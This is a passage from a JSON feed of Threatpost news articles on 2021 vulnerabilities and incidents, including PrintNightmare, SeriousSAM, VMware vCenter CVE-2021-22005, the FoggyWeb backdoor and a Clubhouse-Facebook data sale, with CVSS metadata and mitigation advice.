themselves by simply stopping and disabling the Print Spooler service:\n\n\n\nSource: Microsoft.\n\nCERT/CC also said that since public exploits for Print Spooler attacks use the SMB file-sharing service for remote connectivity to a malicious shared printer, blocking outbound connections to SMB resources would thwart some attacks by blocking malicious SMB printers that are hosted outside of the network.\n\n\u201cHowever, Microsoft indicates that printers can be shared via the Web Point-and-Print Protocol, which may allow installation of arbitrary printer drivers without relying on SMB traffic,\u201d according to CERT/CC. \u201cAlso, an attacker local to your network would be able to share a printer via SMB, which would be unaffected by any outbound SMB traffic rules.\u201d\n\nIn its update advisory for CVE-2021-34481, Microsoft also detailed how to amend the default Point and Print functionality, which prevents non-administrator users from installing or updating printer drivers remotely and which could help mitigate the latest zero-day.\n\nWorried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-12T13:19:50", "type": "threatpost", "title": "Microsoft Warns: Another Unpatched PrintNightmare Zero-Day", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34481", "CVE-2021-34527", "CVE-2021-36958"], "modified": "2021-08-12T13:19:50", "id": "THREATPOST:ADA9E95C8FD42722E783C74443148525", "href": "https://threatpost.com/microsoft-unpatched-printnightmare-zero-day/168613/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-22T20:05:59", "description": "A privilege escalation bug, affecting versions of Windows 10, received a workaround fix by Microsoft Wednesday to prevent attackers from accessing data and creating new accounts on compromised systems.\n\nThe bug, dubbed SeriousSAM, affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers. A prerequisite for abuse of the bug is an adversary needs either remote or local access to the vulnerable Windows 10 system.\n\nTracked as CVE-2021-36934, Microsoft said the vulnerability exists because of overly permissive Access Control Lists on multiple system files, including the (SAM) database. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d the [Microsoft bulletin explains](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). \n[](<https://threatpost.com/newsletter-sign/>)Simply stated, an attacker could leverage the bug to gain access to the SAM database of hashed credentials, which then could be decrypted offline and used to bypass Windows 10 user access controls.\n\n## Proof-of-Concept Available\n\nThe bug is rated important in severity by Microsoft. The flaw was revealed to Microsoft by researchers Jonas Lyk over the weekend and made public Monday. [Proof-of-concept code](<https://github.com/GossiTheDog/HiveNightmare>) was published by researcher Kevin Beaumont to help network admins identify exposure to the bug.\n\nIn a Tweet by Lyk, the researcher said the bug also impacts pre-production versions of Windows 11 (slated to be released in October, 2021). \u201cFor some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file,\u201d [he tweeted](<https://twitter.com/jonasLyk/status/1417205166172950531>).\n\nThe researcher said the bug was discovered while tinkering with Windows 11. He explains that SAM database content, while not accessible on the OS, can be accessed when part of a Windows Shadow Volume Copy (VSS) backup. VSS is a service that allows automatic or manual real-time backups of system files (preserved in their current state) tied to a particular drive letter (volume).\n\nHe later identified the same issue is present on Windows 10 systems dating back to 2018 (v1809).\n\n## **No Patch Available: Workaround Fix Recommended**\n\nFor this reason, Microsoft is recommending sysadmin delete the backup copies of the VSS files. The OS maker does not offer a patch for the bug, rather a simple workaround.\n\nMicrosoft explains the two step process as: \u201cDelete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\\system32\\config\u201d and \u201ccreate a new System Restore point (if desired).\u201d\n\nIt also cautions that deleting VSS shadow copies \u201ccould impact restore operations, including the ability to restore data with third-party backup applications.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-22T12:57:11", "type": "threatpost", "title": "Microsoft Issues Windows 10 Workaround Fix for \u2018SeriousSAM\u2019 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-22T12:57:11", "id": "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "href": "https://threatpost.com/win-10-serioussam/168034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-22T16:20:45", "description": "VMware has released a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that includes patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey\u2019re all serious, but one \u2013 CVE-2021-22005, a critical arbitrary file upload vulnerability in the Analytics service that\u2019s been assigned the maximum CVSSv3 base score of 9.8 \u2013 is uber nasty.\n\n\u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d [said Bob Plankers](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>), Technical Marketing Architect at VMware.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe time to act is yesterday, Plankers wrote:\n\n> \u201cIn this era of ransomware it is safest to assume that an attacker is already inside your network somewhere, on a desktop and perhaps even in control of a user account, which is why we strongly recommend declaring an emergency change and patching as soon as possible.\u201d \u2014Bob Planker, [VMware vSphere blog](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)\n\nThe security update addresses flaws in vCenter Server 6.5, 6.7, and 7.0.\n\n## When to Act?\n\nThe time to act is \u201cRight now,\u201d Plankers said. \u201cThese updates fix a critical security vulnerability, and your response needs to be considered at once.\u201d\n\nCVE-2021-22005 can be used to execute commands and executables on the vCenter Server Appliance. The company didn\u2019t tiptoe around the need for urgent action: Users should patch this vulnerability \u201cimmediately,\u201d VMware said in its [FAQ for VMSA-2021-0020](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>). The bug could have nasty repercussions, with exploits likely being hammered out \u201cminutes after the disclosure,\u201d it said:\n\n> \u201cThe ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\u201d [\u2014VMware FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>)\n\n## Assume That Attackers Are Already In Your System\n\nThis is a ransomware-friendly bug. VMware pointed to the [all-too-real threat](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>) of spiraling ransomware attacks: a growing risk that makes the \u201csafest stance\u201d the assumption that threat actors have already seized control of a desktop and a user account via [phishing](<https://threatpost.com/hackers-deep-sea-phishing/174868/>) or [spearphishing](<https://threatpost.com/linkedin-spear-phishing-job-hunters/165240/>) attacks, it said.\n\nIf a phishing attack has compromised an account(s), it means that the attacker \u201cmay already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence,\u201d VMware stressed.\n\nThis patch is considered an \u201cemergency change\u201d for organizations that practice change management using the [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types, the company said. An emergency change is one that must be introduced ASAP: for example, to resolve a major incident or implement a security patch.\n\nGranted, the decision on how to proceed is up to individual organizations, all of which have different environments, tolerance for risk, security controls and risk mitigation strategies. \u201cThe decision on how to proceed is up to you,\u201d VMware said, but still, given the severity, the company strongly recommends that users act.\n\n## The Other 18 Flaws Are Still Attacker Candy\n\nThe other security issues addressed in Tuesday\u2019s update have lower CVSS scores, but they\u2019re still ripe for the plucking by any attacker that\u2019s already compromised organizations\u2019 networks. That\u2019s one of the \u201cbiggest problems facing IT today,\u201d Plankers wrote: the fact that cyberattackers can persist on a compromised network, \u201cpatiently and quietly\u201d biding their time to eventually move laterally as they use compromised accounts to break into other systems over long periods of time.\n\n\u201cThey steal confidential data, intellectual property, and at the end install ransomware and extort payments from their victims,\u201d Plankers explained. \u201cLess urgent security vulnerabilities can still be potential tools in the hands of attackers, so VMware always recommends patching to remove them.\u201d\n\n## How to CYA (Cover Your Assets)?\n\nIf possible, the quickest way to resolve these serious issues is to patch vCenter Server. If that\u2019s not possible, VMware has workarounds, but only for the critical vulnerability, CVE-2021-22005. The workaround is listed in the [response matrix](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) at the bottom of VMware\u2019s VMware Security Advisory (VMSA), VMSA-2021-0020.\n\nThe workaround involves editing a text file on the VCSA and restarting services.\n\nStill, if possible, patching should be the first choice for a few reasons, Plankers advised:\n\n> First, if you can patch vCenter Server, do it. In general, this is the fastest way to resolve this problem, doesn\u2019t involve editing files on the vCenter Server Appliance (VCSA), and removes the vulnerabilities completely. Patching also carries less technical debt and less risk than using a workaround. \u2014Bob Plankers\n\nOther security controls that can help to protect users\u2019 networks until they can patch include using network perimeter access controls or the vCenter Server Appliance firewall to curtail access to the vCenter Server management interfaces. \u201cWe always strongly suggest limiting access to vCenter Server, ESXi, and vSphere management interfaces to only vSphere Admins,\u201d Plankers said. \u201cDrive all other workload management activity through the VM network connections. This simplifies access control and makes the RDP or ssh management traffic subject to other security controls, such as IDS/IPS and monitoring.\u201d\n\n## More Resources\n\nVMware offered this list of resources:\n\n * [Tips for Patching VMware vSphere](<https://core.vmware.com/tips-patching-vmware-vsphere>) (practical advice for ensuring patching success)\n * [VMware vSphere Security Configuration Guide](<https://core.vmware.com/security-configuration-guide>) (baseline security best practices for vSphere)\n * [VMware Ransomware Resource Center](<https://core.vmware.com/ransomware>) (discussion around tactics to help prevent, deter, and recover from attacks)\n * [VMware Ports & Protocols Firewalling Guidance](<https://ports.vmware.com/>) (ports.vmware.com)\n * [VMware Security Advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) (descriptions of the issues and workarounds)\n * [VMware Communities Forum Thread on VMSA-2021-0020](<https://via.vmw.com/vmsa-2021-0020-community>) (a great place to ask questions)\n * [VMSA-2021-0020: Questions & Answers](<https://via.vmw.com/vmsa-2021-0020-faq>) (questions VMware has received about this issue)\n * [VMSA-2021-0020: What You Need to Know](<https://via.vmw.com/vmsa-2021-0020-blog>) (Plankers\u2019 blog post)\n\n## Can\u2019t Patch What You Don\u2019t Know Is There\n\nGreg Fitzgerald, co-founder of the cybersecurity firm Sevco Security, noted that vulnerabilities such as this one point to the need to go far beyond patching this vCenter bug. \u201cIt\u2019s critical for enterprises to take the first step of patching this vCenter vulnerability, but it can\u2019t stop there,\u201d he told Threatpost on Wednesday.\n\nBeyond patching the initial vulnerability ASAP, enterprises would be well-advised to know what IT assets they have. Even the most fastidious approach to patch management \u201ccannot ensure that all enterprise assets are accounted for,\u201d he said via email. \u201cYou can\u2019t patch something if you don\u2019t know it\u2019s there, and attackers have figured out that the easiest path to accessing your network and your data is often through unknown or abandoned IT assets.\u201d\n\n**Rule #1 of Linux Security: **No cybersecurity solution is viable if you don\u2019t have the basics down. [**JOIN**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the [**4 Golden Rules of Linux Security**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>). Your top takeaway will be a Linux roadmap to getting the basics right! [**REGISTER NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time.\n", "cvss3": {}, "published": "2021-09-22T16:17:33", "type": "threatpost", "title": "VMware Warns of Ransomware-Friendly Bug in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T16:17:33", "id": "THREATPOST:14DD6B793DC77F25538436F7D14C922B", "href": "https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-09-29T14:13:43", "description": "The threat actors behind the notorious SolarWinds supply-chain attacks have dispatched new malware to steal data and maintain persistence on victims\u2019 networks, researchers have found.\n\nResearchers from the Microsoft Threat Intelligence Center (MSTIC) have observed the APT it calls Nobelium using a post-exploitation backdoor dubbed FoggyWeb, to attack Active Directory Federation Services (AD FS) servers. AD FS enables single sign-on (SSO) across cloud-based apps in a Microsoft environment, by sharing digital identity and entitlements rights.\n\nThe attacks started as far back as April, Ramin Nafisi from MSTIC wrote in a [blog post](<https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/>) published Monday.\n\nNobelium is employing \u201cmultiple tactics to pursue credential theft\u201d to gain admin privileges to AD FS servers, Nafisi wrote. Then, once a server is compromised, the threat group deploys FoggyWeb \u201cto remotely exfiltrate the configuration database of compromised AD FS servers, decrypted [token-signing certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/token-signing-certificates>) and [token-decryption certificates](<https://docs.microsoft.com/windows-server/identity/ad-fs/design/certificate-requirements-for-federation-servers>),\u201d he said, which can be used to penetrate into users\u2019 cloud accounts.\n\nIn addition to remotely exfiltrating sensitive data, FoggyWeb also achieves persistence and communicates with a a command-and-control (C2) server to receive additional malicious components and execute them, Nafisi added.\n\n## **Backdoor Breakdown**\n\nNafisi provides a thorough breakdown of the sophisticated FoggyWeb backdoor, which operates by allowing abuse of the Security Assertion Markup Language (SAML) token in AD FS, he explained in the post.\n\n\u201cThe backdoor configures HTTP listeners for actor-defined URIs that mimic the structure of the legitimate URIs used by the target\u2019s AD FS deployment,\u201d Nafisi wrote. \u201cThe custom listeners passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor.\u201d\n\nAttackers store the malware in an encrypted file called _Windows.Data.TimeZones.zh-PH.pri_, while the malicious file _version.dll_ acts as a loader. The DLL file leverages the CLR hosting interfaces and APIs to load FoggyWeb, a managed DLL, in the same Application Domain within which legitimate AD FS managed code is executed.\n\nIn this way, FoggyWeb gains access to the AD FS codebase and resources, including the AD FS configuration database. The malware also inherits AD FS service account permissions that are required to access the AD FS configuration database, Nafisis wrote.\n\nAdditionally, \u201cbecause FoggyWeb is loaded into the same application domain as the AD FS managed code, it gains programmatical access to the legitimate AD FS classes, methods, properties, fields, objects and components that are subsequently leveraged by FoggyWeb to facilitate its malicious operations,\u201d he added.\n\nMoreover, FoggyWeb is also AD FS version-agnostic, which means it doesn\u2019t need to keep track of legacy versus modern configuration table names and schemas, named pipe names and other version-dependent properties of AD FS, Nafisi wrote.\n\n## **Malware Mitigation**\n\nMicrosoft has notified all customers observed being targeted or compromised by FoggyWeb, as well as included a comprehensive list of compromise indicators in the post.\n\nThe company also has recommended several mitigation actions for organizations, including: Auditing of on-premises and cloud infrastructure to identify any changes the actor might have made to maintain access; removing user and app access, reviewing configurations for each, and re-issuing new, strong credentials; and using a hardware security module to prevent the exfiltration of sensitive data.\n\nMicrosoft also is advising that all customers review their AD FS Server configuration and implement whatever changes are needed to secure the systems from attacks.\n\n## **Tracking a Known Threat Actor**\n\nMicrosoft researchers have been keeping a wary eye on Nobelium since the company [got caught up](<https://threatpost.com/microsoft-solarwinds-spy-attack-federal-agencies/162414/>) in the [SolarWinds attack](<https://threatpost.com/solarwinds-default-password-access-sales/162327/>) that was first discovered late last year. They\u2019ve been tracking the threat group\u2019s activity and capabilities, which have expanded as the actors have built and deployed new malware.\n\nSince [the SolarWinds incident](<https://threatpost.com/dhs-sophisticated-cyberattack-foreign-adversaries/162242/>), researchers have observed Nobelium steadily building out its arsenal beyond the Sunburst/Solorigate backdoor and Teardrop malware it initially deployed in that attack, which reached tens of thousands of organizations around the globe (though fewer than 100 were selected by the attackers for actual breach and compromise).\n\nThe group used malware called [Raindrop](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) in those follow-on SolarWinds attacks, then later added [GoldMax, GoldFinder and Sibot](<https://threatpost.com/solarwinds-malware-arsenal-raindrop/163153/>) malware for layered persistence to its toolset.\n\nMicrosoft researchers also identified EnvyScout, BoomBox, NativeZone and VaporRage as four pieces of malware that were used in a Nobelium [email-based attack chain](<https://threatpost.com/solarwinds-nobelium-phishing-attack-usaid/166531/>) earlier this year.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[**_JOIN_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[**_4 Golden Rules of Linux Security_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[**_REGISTER NOW_**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T14:39:49", "type": "threatpost", "title": "SolarWinds Attackers Hit Active Directory Servers with FoggyWeb Backdoor", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T14:39:49", "id": "THREATPOST:CD203B10BCB138850F42815F74C8A5AF", "href": "https://threatpost.com/solarwinds-active-directory-servers-foggyweb-backdoor/175056/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "On its own, the database of 3.8 billion phone numbers [leaked from ](<https://threatpost.com/clubhouse-users-data-hacker-forum/165354/>) social-media platform Clubhouse didn\u2019t have much value on the underground market. In fact, they were eventually dumped in a hacker forum for free.\n\nBut an enterprising threat actor has reportedly combined those phone numbers with 533 million [Facebook profiles leaked last April](<https://threatpost.com/facebook-accounts-leaked-check-exposed/165245/>) and is selling that enFhanced trove of personal identifiable information (PII) to the highest bidder on the underground market.\n\nAccording to CyberNews, the combined [Clubhouse-Facebook database](<https://cybernews.com/security/3-8-billion-allegedly-scraped-and-merged-clubhouse-and-facebook-user-records-put-for-sale-online/>) includes names, phone numbers and other data, and is listed on an underground forum for $100,000 for all 3.8 billion entries, with smaller chunks of data available for less. Reportedly, the seller is still looking for buyers.\n\n## **Data Likely to Fuel ATO Attacks **\n\nThese credentials could quickly be leveraged for basic account takeover (ATO) attacks, according to Brian Uffelman, who is a security analyst for PerimeterX.\n\n\u201cThese stolen credentials are then used for credential-stuffing and ATO attacks, which can steal value, whether that is in the form of gift cards, credit-card numbers, loyalty points or making false purchases,\u201d Uffelman told Threatpost. \u201cATO attacks are a major threat to any business and all of this just creates more fuel to feed the ATO attack fire.\u201d\n\nHe added that it\u2019s much easier for cybercriminals to use stolen credentials than to do the work of trying to find holes in an organization\u2019s cybersecurity defenses. In fact, Uffelman pointed out PerimeterX research showed out of all login attempts measured in the second-half of 2020, up to 85 percent were ATO attempts.\n\n\u201cOrganizations need to be aware of signs that they\u2019ve been attacked,\u201d Uffelman warned. \u201cThese can include surges in help-desk calls, spikes in password resets and inhuman user behaviors, such as thousands of login attempts on an account in a short time period and then take the appropriate action to block these attacks.\u201d\n\nUsers need to be aware of signs of breach, too, he added.\n\n\u201cConsumers need to ensure they are using varied and robust passwords across different websites and applications and lock down their credit reports as well.\u201d\n\n## **Facebook-Clubhouse Data Will Fuel Smishing Attacks **\n\n[Smishing](<https://threatpost.com/smishing-text-phishing-ciso-radar/165634/>), or socially engineered phishing attempts conducted through SMS text messages, is a likely way cybercriminals will try to turn this database into profit, Jake Williams, from BreachQuest told Threatpost.\n\n\u201cWith this information, threat actors can send SMS phishes while spoofing the sender\u2019s number of a known friend,\u201d Williams said. \u201cA threat actor could go even further by using an SMS phishing pretext tailored to the victim based on their recent Facebook posts. Users are advised to be extremely careful in acting on unexpected SMS messages, even from senders they believe they know.\u201d\n\nWilliams added that Clubhouse users need to be on the lookout for suspicious texts, particularly those asking to transfer funds or confirm requests with a phone call, which are both common smishing tactics.\n\nAnd even if petty thieves don\u2019t see the value in the information, John Bambenek from Netenrich told Threatpost that he suspects intelligence agencies will take notice.\n\n\u201cBreaches like these often get sold at a discount because the ones who stole the data don\u2019t know what to do with it. In some cases, intelligence agencies will buy them if they have targets of interest on those platforms,\u201d Bambenek said. \u201cLikely the biggest use will go into the secondary consumer data market for those who want to build profiles for specific ad targeting.\u201d\n\nBeyond immediate ramifications of the enhanced data falling into the wrong hands, Archie Agarwal from ThreatModeler pointed out that as these leaks continue, it will enable threat actors to create incredibly rich profiles of targets.\n\n\u201cAside from using data like this for more targeted scamming, there is a much larger concern,\u201d Agarwal told Threatpost. \u201cAs we share more and more personal information across an ever-growing list of social-media platforms, combining data gleaned from this type of scraping, together with leaked breach information and leveraging big-data analytics to mine it, could potentially reveal previously hidden information and behaviors on users.\u201d\n\n## **Users Have Accepted Risks **\n\nWhile the infosec community is alarmed by the prospect of all that data floating around, Roger Grimes from KnowBe4 doesn\u2019t expect the seller of the combined Clubhouse-Facebook data to get much finanical gain out of the deal.\n\n\u201cMy bet is the seller doesn\u2019t get anywhere close to their $100,000 asking price. It\u2019s not a scarce resource,\u201d Grimes said in an email to Threatpost.\n\nHe also noted that while he agrees the data could fuel future smishing and other socially engineered attacks, he doesn\u2019t suspect much pushback from users.\n\n\u201cI think most people simply see this as a cost of using free internet services, Clubhouse or any other service,\u201d he said.\n\n_**Rule #1 of Linux Security: **__No cybersecurity solution is viable if you don\u2019t have the basics down. _[_JOIN_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ Threatpost and Linux security pros at Uptycs for a LIVE roundtable on the _[_4 Golden Rules of Linux Security_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_. Your top takeaway will be a Linux roadmap to getting the basics right! _[_REGISTER NOW_](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>)_ and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-27T14:59:58", "type": "threatpost", "title": "3.8 Billion Users\u2019 Combined Clubhouse, Facebook Data Up for Sale", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T14:59:58", "id": "THREATPOST:5E56D9C77DAD674F8B21F56E904893D4", "href": "https://threatpost.com/clubhouse-facebook-data-sale/175023/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T22:42:30", "description": "A fully working exploit for the critical CVE-2021-22005 remote code-execution (RCE) vulnerability in VMware vCenter is now public and being exploited in the wild.\n\nReleased on Monday by Rapid7 security engineer William Vu (who goes by the Twitter handle [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>)), this one\u2019s different from the incomplete proof-of-concept (PoC) exploit that began making the rounds on Friday. This variant can be used to open a reverse shell on a vulnerable server, allowing remote attackers to execute arbitrary code.\n\nThe vulnerability can be exploited by unauthenticated, remote users and allows attackers to upload a file to the vCenter Server analytics service.\n\n## UPDATE: Indicators of Exploit\n\nUPDATE: 092821 16:21 The attack team at the attack surface management firm Randori also has a working RCE exploit for CVE-2021-22005. Zero-day finder Aaron Portnoy detailed the exploit in his [attack notes](<https://www.randori.com/blog/technical-analysis-vcenter-vmsa-2021-0020/>), which also include detection methods and indicators of exploit that defenders can use to determine whether or not they\u2019ve been exploited by this bug.\n\nRandori confirmed what VMware, CISA and everybody else is saying: Namely, that these vulnerabilities \u201care very serious issues,\u201d and that affected organizations \u201cshould take immediate action to ensure the security of impacted devices.\u201d As it is, Portnoy said, CISA has predicted a high likelihood that foreign actors will move quickly to exploit the vulnerability.\n\nPortnoy also reiterated what VMware has already stressed: To wit, users should just assume that they\u2019re already infected. \u201cOrganizations that have or had affected vCenter versions exposed to the Internet, since the vulnerability was made public on September 21, should assume that an adversary may have gained access to their network and review historical logs for anomalous behavior, such as abnormal usernames or source IP connections, and signs of compromise,\u201d he wrote.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nBelow is Vu\u2019s unredacted RCE proof-of-concept exploit against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled. Through [CEIP](<https://www.vmware.com/solutions/trustvmware/ceip.html>), VMware collects technical information about customers\u2019 use of its products. The CEIP is toggled [on as a default](<https://docs.vmware.com/en/VMware-Cloud-Foundation/4.0/com.vmware.vcf.vxrail.admin.doc/GUID-2B70F601-7D01-4609-AB1A-870A20485B67.html#:~:text=The%20Join%20the%20VMware%20Customer,Click%20Apply.>) setting in VMware Cloud Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/09/28100106/Unredacted-RCE-PoC-against-CEIP-e1632837685764.png>)\n\nUnredacted RCE PoC against VMware\u2019s CEIP. Source: [wvu](<https://twitter.com/wvuuuuuuuuuuuuu/status/1442634215330390020/photo/1>).\n\nNot that configurations matter with this vulnerability, VMware said last week. \u201cThis vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server,\u201d said Bob Plankers, technical marketing architect at VMware, when VMware [announced](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) the vulnerability on Tuesday.\n\nCERT/CC vulnerability analyst [Will Dormann](<https://twitter.com/wdormann>) noted that a redacted PoC that Vu listed at the start of a thread that began on Friday didn\u2019t require CEIP to be enabled. \u201cUnclear if THAT one is being used in the wild now,\u201d Dormann said.\n\nAccording to Vu\u2019s [technical analysis](<https://www.bleepingcomputer.com/news/security/working-exploit-released-for-vmware-vcenter-cve-2021-22005-bug/>), the full, unredacted PoC starts with a request to create a directory for path traversal and schedules the spawn of a reverse shell.\n\n## History of a Bad Bug\n\n[VMware announced](<https://threatpost.com/vmware-ransomware-bug-vcenter-server/174901/>) CVE-2021-22005 a week ago, on Sept. 21, as part of a [security update](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) that included patches for 19 CVE-numbered vulnerabilities that affect the company\u2019s vCenter Server virtualization management platform and its hybrid Cloud Foundation platform for managing VMs and orchestrating containers.\n\nThey were all serious, but CVE-2021-22005 \u2013 a critical arbitrary file upload vulnerability in the Analytics service \u2013 was assigned a CVSSv3 base score of 9.8 out of a maximum severity rating of 10. VMware urged users to declare an \u201cemergency change\u201d per [ITIL definitions](<https://wiki.en.it-processmaps.com/index.php/Change_Management>) of change types and to patch as soon as possible.\n\nAlso, on Friday, the Cybersecurity and Infrastructure Security Agency [(CISA) warned](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>) that VMware had confirmed that threat actors were exploiting the bug and that security researchers were reporting mass scanning for vulnerable vCenter servers and publicly available exploit code. CISA urged users with vulnerable systems to prioritize updating or to apply VMware\u2019s [workaround](<https://kb.vmware.com/s/article/85717>).\n\n\u201cDue to the availability of exploit code, CISA expects widespread exploitation of this vulnerability,\u201d the advisory stated.\n\n## Know What Assets Need to Be Patched\n\nIn addition to prioritizing patching, it\u2019s important to know about all the assets that need to be patched, according to Greg Fitzgerald, co-founder of the cybersecurity firm Sevco Security.\n\n\u201cWe\u2019ve found that the vast majority of enterprises have robust patch management tools that are extremely effective at what they\u2019re designed to do: Applying patches to assets that security and IT teams know about,\u201d he told Threatpost via email on Tuesday.\n\nHe continued: \u201cCompanies are not getting breached because their patch management tools aren\u2019t good enough. They\u2019re getting breached because it\u2019s impossible to patch an asset you don\u2019t know is there in the first place. Maintaining an accurate IT 